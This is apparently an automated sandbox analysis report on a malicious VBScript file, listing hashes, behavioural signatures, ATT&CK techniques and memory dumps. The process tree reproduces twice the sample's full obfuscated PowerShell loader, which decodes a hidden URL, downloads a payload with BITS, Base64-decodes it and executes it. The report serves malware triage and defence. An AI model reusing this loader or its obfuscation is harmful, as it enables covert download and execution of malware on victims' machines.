52ea9be06a5b9c5aedeedfe236973dd48d1a3b694c58f4e12e1d2f7946cc2f1b

General

Target

5170006981.vbs
Size

124KB
MD5

4eb5819a85e373ef8ba7330d671045e5
SHA1

50db1df29877f7ffbd5a55011f4e15118113ee21
SHA256

dcc131a97cf6fdc68ac23fa0fef7da91ea0998251522670a94af7580eacc0a00
SHA512

e919ac440aeac6871bf7d49a2f410905c87b309c01eca9b8b50af8a9e0ac7efcc0b2d31494d0fca3b1ade739af4a6cfe8037b2b5e49a534f66d8430653ee7f13
SSDEEP

3072:Kvgb9MaQAP2TEEebU7ti0evVePbV4AI/UnKfBd7:ygb9Map2TEEoawVezRIJ5

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	1724	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4964	powershell.exe
4964	powershell.exe
5076	powershell.exe
5076	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 1724 wrote to memory of 4964	1724	WScript.exe	90
PID 1724 wrote to memory of 4964	1724	WScript.exe	90
PID 4964 wrote to memory of 5076	4964	powershell.exe	92
PID 4964 wrote to memory of 5076	4964	powershell.exe	92
PID 4964 wrote to memory of 5076	4964	powershell.exe	92

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5170006981.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Specksioneer9 ($Ungarnsturen){$Hypoptyalism = $Ungarnsturen.Length-1; For ($beskygges=6; $beskygges -lt $Hypoptyalism){$Sygedagens=$Sygedagens+$Ungarnsturen.Substring( $beskygges, 1);$beskygges+=7;}$Sygedagens;}$Terrell=Specksioneer9 'SidewahJenkrot ensigt ValutpVentri:Totale/ Sonob/ ArbejrUnlocaamagnetc Idiopk LoiteoFdemidosundewnForhan.OpridsnAbsorpe BijoutCholin/WaterlkBarsse2Fleech/PulverHPantaleVisirsl afkrsiEvereaoFattigpUdbindoJordanr JvnfraLairag.RewallaLastvocMeganuaBatesi ';$Sygedagens01=Specksioneer9 'TriplaiDeptheeKloninxSwinep ';$Coniacian = Specksioneer9 'Folkeb\RepostsaleuroyFundensDepoliwVerdenoStamgsw Jeton6Selska4Legiti\ FllesW InteriRaportnDelmngdBeraaboEdsaflwrevampsKrypteP LavadoPerpetwHipflaeJagererBaaltaSLiterahBefrieeHispanlKinestl Vesse\AnskafvFredss1 Demar.Strafc0Krigsl\ WealtpOnkilooRumswiwReamyveOmordnrOssboksJentjehAppreteLikvidlLexicol Diffe. PresaeAlainex NedkueSystem ';& ($Sygedagens01) (Specksioneer9 'Ultrac$sikkerlplebisoIntrodwBuckelbbrneskr HushooAssertwRotade2Gregar=Mantua$BintjeeHendecnNonprov Brner:HonorewPrntrai FirernMilitadOrganiiNdvendr Melas ') ;& ($Sygedagens01) (Specksioneer9 'Electr$MisfarCIbrugto StjlenRablediElectra BanjocJubiluiHypocyaPyruvan Terra=Oceano$LysreklPotentoBageriwCacodabRosenbrLavtsto FlowiwMadsci2Temene+Fdesta$BiocidC AndreoInstrunProsaiiKontamaUnsuppcForestiGulfstaBreedlnSvarlo ') ;& ($Sygedagens01) (Specksioneer9 'Schnab$StrangIForfatnMorfoltBlethee TheorrOverareuintahsTribroskrookoeBotaninRubblitGovernsUafstteRageedlPremons EtruskForhaaa DyrebbKafeersPilarn Algode=Intran Holdin( Snick(realkrgLbenumw SemipmGarnfiiConver BloodmwAileroiSmilernStenkn3Knivst2 Benzi_quayedp StetirStreptoPapooscRamisfeKyklopsKontrosBindeh Underp-EnergiFBenzin RammeaP AnalormatrosoRehabicOxmanseMindresArapahsImpactISociald Walli= Skytt$Snkekl{TimmysPUdkradILaereaDFrgemm}Regnsk) Overs.PensioCElapstoCommpumModposm FarveaNegmfrnStockjdSporidLRuggediFyresenNursereEvolut)Teksti Svingt-aftenosmiltenpThaneslMennesiStrophtAnpart Lacuna[ MarmacNedskrhHydromaSildesr violo]Colead3Unders4Kommen ');. ($Sygedagens01) (Specksioneer9 'Finger$SnirklR Portae BoeresbetnkeuGymnasfDrsinefMacadaeredargrProetu Kirker=Summet sigtel$FedtldI SammenLoftsbtKrydsreIrritarIdiosee UnvoisDelmodsDeceive TilbunBryophtKolonnsHaandae ToothlIntergs forbyk PhotoaTiarslb ReemesSchola[ Hyrac$EksameILapsusnLinstot LezghehaloedrAffinaeFailansSustensPuffene treefnRearsut Trkpls AndraeOktaedl KalifsAngkamkUngkreaDamrodbakkordsKoloni.PointocstilleoLavaldu HypnonKrlightUnequi- Danma2Myente]Adulla ');. ($Sygedagens01) (Specksioneer9 'Ekspos$MounteDFiniciiFatgoiaElitescNonimmeGudmodtBanneryYarryrlStereoeSalgsfnAirfloeReticu=Picojo(AmphipTDobbele OverhsUtraqutinhibi- RenasPmicrobaAphanitSkoldmh Dpico Seized$ ProgrCPredipoSvartynOrthoci TttekaLibellcDrexelikonomia RuinsnNomogr)Relaxa Fleab-ImportAMarinanAmalgadAlitza Formul( Skidt[AggravISukkernForsvatCoalitPUnshaptIndfrsrUnfact]Unplan: fortr:Uforgls blituiFilolozIndsaee Miljb Touche-Clinche IntraqHjrepr Revanc8Tingen)Strejf ') ;if ($Diacetylene) {& $Coniacian $Resuffer;} else {;$Sygedagens00=Specksioneer9 'CoachwSfremsktAmfibiaCoulagrJdekagtNavige-UskrmtBByzoneiMicrobtPerfeks srskiTEmdruprEbbedsaHjdedrn coravsPiprinf CloggeEctromrUdduns Erogen- HymenSSpitaloTokronuBakeaprAmtskocFiasdyeMorali Turnip$succesTTreacleCertderFlockir NazipePilotolConcurl Drmme Uskiks-TidselDTidsske ErstasgracertGennemiInapponFrkkeraNymphat UdkaaiOphthaoLissebnFuligu domner$HypernlCankeroBidragw Byggeb BarlerGoghbroMetrenw Engro2 Nonva ';. ($Sygedagens01) (Specksioneer9 'Stamin$ForsvildilatooEnebrbw NincobSarcosr UnforoSpisevw Parti2Sikker=Xanthe$PeniteeAntastnPyromavdiskur:SubcooaGardinpDownrapFunktidMistila ReeditAmtsliaOmsvin ') ;& ($Sygedagens01) (Specksioneer9 'ShielsIIndeksmNaphthp reveloSpiflirCastelt Pomes- KaffeMUdformoSugeevd LadekuReassulSyndereRamess sprogrBDivergiJugheatWorldwsLincolTFyrrenrNaturfaHeteronIrrelis TrayafudklkneMalmenrFiredr ') ;$lowbrow2=$lowbrow2+'\Beholdende.Tar';while (-not $Troskyldig) {& ($Sygedagens01) (Specksioneer9 'Rendes$PruhesT Worshr Vandbo kommasBrachykFornikyMerianlHydrandFejlteiForuregHivesu=Krysol(MatemaTAmfibiekursussSakskbtNonhyp-SprngsPSkalkeaflygtntLsbladhinezsa Charme$AntagolEightsoMetastwNatmadbSheeplrBovnedoMotorsw Tumbl2otidid)Astrog ') ;& ($Sygedagens01) $Sygedagens00;& ($Sygedagens01) (Specksioneer9 'skrvebS PaleotPaakrsaFloterrAudiontMetrop-KnuderS clandlAnalyse protoe GalpepCobalt Antine5 Eulac ');}. ($Sygedagens01) (Specksioneer9 'Bagtro$FedthaSUnmovepantifoeFromtac ForfakCertifsTorniriEmbanko ObjeknRhemise Strome HandirLampbl Decenn=Maggot DesorbGCalcarePalraat Komik-ChenetCAquipaoSpringn Tremit SvmmeeverisinIdentitMinyan Interv$SasarelSlumbeoOscillw GlemmbKollegr RigshoBortviwKlendu2Kardin ');& ($Sygedagens01) (Specksioneer9 'Opgave$furnacLInsolvoHidrreoEmporypUnderriDragglnSikhergScreen inkomp=Samspi Munici[RepricSNitronyOvercusSharabtSwalloeArkolomBegynd.BuksebCBandcaoOphavsnreverbvDomstoe ReinfrDiammitCampho]Minimu: Misty:BeskytFTardilrBorgfroengangmGrimieBSanskraDiplomsBademeeDerude6Empido4decontSdisciptalveolrIldfuliKaplbenIncitagPokess( Ekspa$ViscerSReconfpTildigeFederacSystemkHomochsTodayciwhippeoFirevrnDesilleTravheeElendirSeques) Untac ');&($Sygedagens01) (Specksioneer9 'Duodec$PapiraSOtotoxy Underg SpoereMisrekdVeteriaCorriggBedelleTjentonChampisLenini2Unabus Ejerin=Forest sterss[ DiseqSSubtreyDegradsMoultotoperateGennemmPyroly. HaugeTWhelpleGorebixFredeltUnderg.instruEOpladenSkurvec Kommuoteutomd Redigi FriennHypostg trila]Doubty: Semis:ForarbAsollicSLullycCStamveISkinkeIVorage.mononiGSubstreBaerestDemonoSOpiniotOffentrLappeti PrimenUndertg Selsk(Bentin$PalamiLGradalo MatrioSkotvipUnhypoiHuemulnMaximigUnpate)Mangan ');& ($Sygedagens01) (Specksioneer9 'paavir$VaroomEMarineuBrailsrSaintooHosligpdisjoiaUgelnnmMegaloeAlfonssPassagtdaemonrBudhloeelverksUnrasp2Interv0dannek3Nummer=Egenbe$AdiashSModpolyLimensgKrydsreAlurgid BaccaaOverdigSeksfoeIrresundemonssskoenn2gudske.MesallsWelleruModernbBankrisTrickotKlvederMelanti Geogcn Septeg Under( Demon2Schizo6Intrik3Sliver3Ridder2 Reeks1Alidas,Kompen2Father6Crabsh1Bachel0Blanke8Vlgerf)proced ');. ($Sygedagens01) $Europamestres203;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4964
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Specksioneer9 ($Ungarnsturen){$Hypoptyalism = $Ungarnsturen.Length-1; For ($beskygges=6; $beskygges -lt $Hypoptyalism){$Sygedagens=$Sygedagens+$Ungarnsturen.Substring( $beskygges, 1);$beskygges+=7;}$Sygedagens;}$Terrell=Specksioneer9 'SidewahJenkrot ensigt ValutpVentri:Totale/ Sonob/ ArbejrUnlocaamagnetc Idiopk LoiteoFdemidosundewnForhan.OpridsnAbsorpe BijoutCholin/WaterlkBarsse2Fleech/PulverHPantaleVisirsl afkrsiEvereaoFattigpUdbindoJordanr JvnfraLairag.RewallaLastvocMeganuaBatesi ';$Sygedagens01=Specksioneer9 'TriplaiDeptheeKloninxSwinep ';$Coniacian = Specksioneer9 'Folkeb\RepostsaleuroyFundensDepoliwVerdenoStamgsw Jeton6Selska4Legiti\ FllesW InteriRaportnDelmngdBeraaboEdsaflwrevampsKrypteP LavadoPerpetwHipflaeJagererBaaltaSLiterahBefrieeHispanlKinestl Vesse\AnskafvFredss1 Demar.Strafc0Krigsl\ WealtpOnkilooRumswiwReamyveOmordnrOssboksJentjehAppreteLikvidlLexicol Diffe. PresaeAlainex NedkueSystem ';& ($Sygedagens01) (Specksioneer9 'Ultrac$sikkerlplebisoIntrodwBuckelbbrneskr HushooAssertwRotade2Gregar=Mantua$BintjeeHendecnNonprov Brner:HonorewPrntrai FirernMilitadOrganiiNdvendr Melas ') ;& ($Sygedagens01) (Specksioneer9 'Electr$MisfarCIbrugto StjlenRablediElectra BanjocJubiluiHypocyaPyruvan Terra=Oceano$LysreklPotentoBageriwCacodabRosenbrLavtsto FlowiwMadsci2Temene+Fdesta$BiocidC AndreoInstrunProsaiiKontamaUnsuppcForestiGulfstaBreedlnSvarlo ') ;& ($Sygedagens01) (Specksioneer9 'Schnab$StrangIForfatnMorfoltBlethee TheorrOverareuintahsTribroskrookoeBotaninRubblitGovernsUafstteRageedlPremons EtruskForhaaa DyrebbKafeersPilarn Algode=Intran Holdin( Snick(realkrgLbenumw SemipmGarnfiiConver BloodmwAileroiSmilernStenkn3Knivst2 Benzi_quayedp StetirStreptoPapooscRamisfeKyklopsKontrosBindeh Underp-EnergiFBenzin RammeaP AnalormatrosoRehabicOxmanseMindresArapahsImpactISociald Walli= Skytt$Snkekl{TimmysPUdkradILaereaDFrgemm}Regnsk) Overs.PensioCElapstoCommpumModposm FarveaNegmfrnStockjdSporidLRuggediFyresenNursereEvolut)Teksti Svingt-aftenosmiltenpThaneslMennesiStrophtAnpart Lacuna[ MarmacNedskrhHydromaSildesr violo]Colead3Unders4Kommen ');. ($Sygedagens01) (Specksioneer9 'Finger$SnirklR Portae BoeresbetnkeuGymnasfDrsinefMacadaeredargrProetu Kirker=Summet sigtel$FedtldI SammenLoftsbtKrydsreIrritarIdiosee UnvoisDelmodsDeceive TilbunBryophtKolonnsHaandae ToothlIntergs forbyk PhotoaTiarslb ReemesSchola[ Hyrac$EksameILapsusnLinstot LezghehaloedrAffinaeFailansSustensPuffene treefnRearsut Trkpls AndraeOktaedl KalifsAngkamkUngkreaDamrodbakkordsKoloni.PointocstilleoLavaldu HypnonKrlightUnequi- Danma2Myente]Adulla ');. ($Sygedagens01) (Specksioneer9 'Ekspos$MounteDFiniciiFatgoiaElitescNonimmeGudmodtBanneryYarryrlStereoeSalgsfnAirfloeReticu=Picojo(AmphipTDobbele OverhsUtraqutinhibi- RenasPmicrobaAphanitSkoldmh Dpico Seized$ ProgrCPredipoSvartynOrthoci TttekaLibellcDrexelikonomia RuinsnNomogr)Relaxa Fleab-ImportAMarinanAmalgadAlitza Formul( Skidt[AggravISukkernForsvatCoalitPUnshaptIndfrsrUnfact]Unplan: fortr:Uforgls blituiFilolozIndsaee Miljb Touche-Clinche IntraqHjrepr Revanc8Tingen)Strejf ') ;if ($Diacetylene) {& $Coniacian $Resuffer;} else {;$Sygedagens00=Specksioneer9 'CoachwSfremsktAmfibiaCoulagrJdekagtNavige-UskrmtBByzoneiMicrobtPerfeks srskiTEmdruprEbbedsaHjdedrn coravsPiprinf CloggeEctromrUdduns Erogen- HymenSSpitaloTokronuBakeaprAmtskocFiasdyeMorali Turnip$succesTTreacleCertderFlockir NazipePilotolConcurl Drmme Uskiks-TidselDTidsske ErstasgracertGennemiInapponFrkkeraNymphat UdkaaiOphthaoLissebnFuligu domner$HypernlCankeroBidragw Byggeb BarlerGoghbroMetrenw Engro2 Nonva ';. ($Sygedagens01) (Specksioneer9 'Stamin$ForsvildilatooEnebrbw NincobSarcosr UnforoSpisevw Parti2Sikker=Xanthe$PeniteeAntastnPyromavdiskur:SubcooaGardinpDownrapFunktidMistila ReeditAmtsliaOmsvin ') ;& ($Sygedagens01) (Specksioneer9 'ShielsIIndeksmNaphthp reveloSpiflirCastelt Pomes- KaffeMUdformoSugeevd LadekuReassulSyndereRamess sprogrBDivergiJugheatWorldwsLincolTFyrrenrNaturfaHeteronIrrelis TrayafudklkneMalmenrFiredr ') ;$lowbrow2=$lowbrow2+'\Beholdende.Tar';while (-not $Troskyldig) {& ($Sygedagens01) (Specksioneer9 'Rendes$PruhesT Worshr Vandbo kommasBrachykFornikyMerianlHydrandFejlteiForuregHivesu=Krysol(MatemaTAmfibiekursussSakskbtNonhyp-SprngsPSkalkeaflygtntLsbladhinezsa Charme$AntagolEightsoMetastwNatmadbSheeplrBovnedoMotorsw Tumbl2otidid)Astrog ') ;& ($Sygedagens01) $Sygedagens00;& ($Sygedagens01) (Specksioneer9 'skrvebS PaleotPaakrsaFloterrAudiontMetrop-KnuderS clandlAnalyse protoe GalpepCobalt Antine5 Eulac ');}. ($Sygedagens01) (Specksioneer9 'Bagtro$FedthaSUnmovepantifoeFromtac ForfakCertifsTorniriEmbanko ObjeknRhemise Strome HandirLampbl Decenn=Maggot DesorbGCalcarePalraat Komik-ChenetCAquipaoSpringn Tremit SvmmeeverisinIdentitMinyan Interv$SasarelSlumbeoOscillw GlemmbKollegr RigshoBortviwKlendu2Kardin ');& ($Sygedagens01) (Specksioneer9 'Opgave$furnacLInsolvoHidrreoEmporypUnderriDragglnSikhergScreen inkomp=Samspi Munici[RepricSNitronyOvercusSharabtSwalloeArkolomBegynd.BuksebCBandcaoOphavsnreverbvDomstoe ReinfrDiammitCampho]Minimu: Misty:BeskytFTardilrBorgfroengangmGrimieBSanskraDiplomsBademeeDerude6Empido4decontSdisciptalveolrIldfuliKaplbenIncitagPokess( Ekspa$ViscerSReconfpTildigeFederacSystemkHomochsTodayciwhippeoFirevrnDesilleTravheeElendirSeques) Untac ');&($Sygedagens01) (Specksioneer9 'Duodec$PapiraSOtotoxy Underg SpoereMisrekdVeteriaCorriggBedelleTjentonChampisLenini2Unabus Ejerin=Forest sterss[ DiseqSSubtreyDegradsMoultotoperateGennemmPyroly. HaugeTWhelpleGorebixFredeltUnderg.instruEOpladenSkurvec Kommuoteutomd Redigi FriennHypostg trila]Doubty: Semis:ForarbAsollicSLullycCStamveISkinkeIVorage.mononiGSubstreBaerestDemonoSOpiniotOffentrLappeti PrimenUndertg Selsk(Bentin$PalamiLGradalo MatrioSkotvipUnhypoiHuemulnMaximigUnpate)Mangan ');& ($Sygedagens01) (Specksioneer9 'paavir$VaroomEMarineuBrailsrSaintooHosligpdisjoiaUgelnnmMegaloeAlfonssPassagtdaemonrBudhloeelverksUnrasp2Interv0dannek3Nummer=Egenbe$AdiashSModpolyLimensgKrydsreAlurgid BaccaaOverdigSeksfoeIrresundemonssskoenn2gudske.MesallsWelleruModernbBankrisTrickotKlvederMelanti Geogcn Septeg Under( Demon2Schizo6Intrik3Sliver3Ridder2 Reeks1Alidas,Kompen2Father6Crabsh1Bachel0Blanke8Vlgerf)proced ');. ($Sygedagens01) $Europamestres203;}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5076

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lccojrqi.wa4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4964-45-0x00007FFF23380000-0x00007FFF23E41000-memory.dmp

Filesize
10.8MB

Download
memory/4964-14-0x00007FFF23380000-0x00007FFF23E41000-memory.dmp

Filesize
10.8MB

Download
memory/4964-15-0x000002172C2B0000-0x000002172C2C0000-memory.dmp

Filesize
64KB

Download
memory/4964-17-0x000002172C2B0000-0x000002172C2C0000-memory.dmp

Filesize
64KB

Download
memory/4964-16-0x000002172C2B0000-0x000002172C2C0000-memory.dmp

Filesize
64KB

Download
memory/4964-48-0x000002172C2B0000-0x000002172C2C0000-memory.dmp

Filesize
64KB

Download
memory/4964-47-0x000002172C2B0000-0x000002172C2C0000-memory.dmp

Filesize
64KB

Download
memory/4964-4-0x0000021713D60000-0x0000021713D82000-memory.dmp

Filesize
136KB

Download
memory/4964-46-0x000002172C2B0000-0x000002172C2C0000-memory.dmp

Filesize
64KB

Download
memory/5076-19-0x00000000028A0000-0x00000000028B0000-memory.dmp

Filesize
64KB

Download
memory/5076-42-0x00000000084F0000-0x0000000008A94000-memory.dmp

Filesize
5.6MB

Download
memory/5076-24-0x00000000059E0000-0x0000000005A46000-memory.dmp

Filesize
408KB

Download
memory/5076-34-0x0000000005A50000-0x0000000005DA4000-memory.dmp

Filesize
3.3MB

Download
memory/5076-35-0x0000000005FD0000-0x0000000005FEE000-memory.dmp

Filesize
120KB

Download
memory/5076-36-0x00000000060D0000-0x000000000611C000-memory.dmp

Filesize
304KB

Download
memory/5076-37-0x00000000028A0000-0x00000000028B0000-memory.dmp

Filesize
64KB

Download
memory/5076-38-0x00000000078C0000-0x0000000007F3A000-memory.dmp

Filesize
6.5MB

Download
memory/5076-39-0x00000000065E0000-0x00000000065FA000-memory.dmp

Filesize
104KB

Download
memory/5076-40-0x00000000072E0000-0x0000000007376000-memory.dmp

Filesize
600KB

Download
memory/5076-41-0x0000000007240000-0x0000000007262000-memory.dmp

Filesize
136KB

Download
memory/5076-23-0x0000000005210000-0x0000000005276000-memory.dmp

Filesize
408KB

Download
memory/5076-43-0x0000000007620000-0x0000000007642000-memory.dmp

Filesize
136KB

Download
memory/5076-44-0x00000000076A0000-0x00000000076B4000-memory.dmp

Filesize
80KB

Download
memory/5076-22-0x0000000005160000-0x0000000005182000-memory.dmp

Filesize
136KB

Download
memory/5076-21-0x0000000005280000-0x00000000058A8000-memory.dmp

Filesize
6.2MB

Download
memory/5076-20-0x0000000002700000-0x0000000002736000-memory.dmp

Filesize
216KB

Download
memory/5076-18-0x0000000074B60000-0x0000000075310000-memory.dmp

Filesize
7.7MB

Download
memory/5076-49-0x0000000074B60000-0x0000000075310000-memory.dmp

Filesize
7.7MB

Download
memory/5076-51-0x00000000028A0000-0x00000000028B0000-memory.dmp

Filesize
64KB

Download
memory/5076-52-0x00000000028A0000-0x00000000028B0000-memory.dmp

Filesize
64KB

Download
memory/5076-53-0x00000000028A0000-0x00000000028B0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing